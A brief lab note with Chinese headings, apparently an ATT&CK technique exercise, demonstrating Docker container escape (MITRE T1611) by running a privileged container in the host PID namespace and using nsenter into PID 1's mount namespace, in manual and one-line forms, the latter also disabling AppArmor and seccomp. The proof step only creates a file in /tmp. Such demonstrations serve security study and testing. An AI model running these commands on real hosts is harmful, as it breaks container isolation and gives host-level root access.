Docker >> Container Escape
MITRE T1611
參考資訊:
1. T1611
手動執行:
root@user:~# docker run --rm -it --privileged --pid=host alpine /bin/sh
/ # nsenter --mount=/proc/1/ns/mnt -- /bin/bash
root@xxx:/# touch /tmp/container_escape_demo
root@xxx:/# exit
/ # exit
root@user:~# ls /tmp/
container_escape_demo
自動執行:
root@user:~# docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined --privileged --pid=host alpine nsenter --mount=/proc/1/ns/mnt -- touch /tmp/container_escape_demo
root@user:~# ls /tmp/
container_escape_demo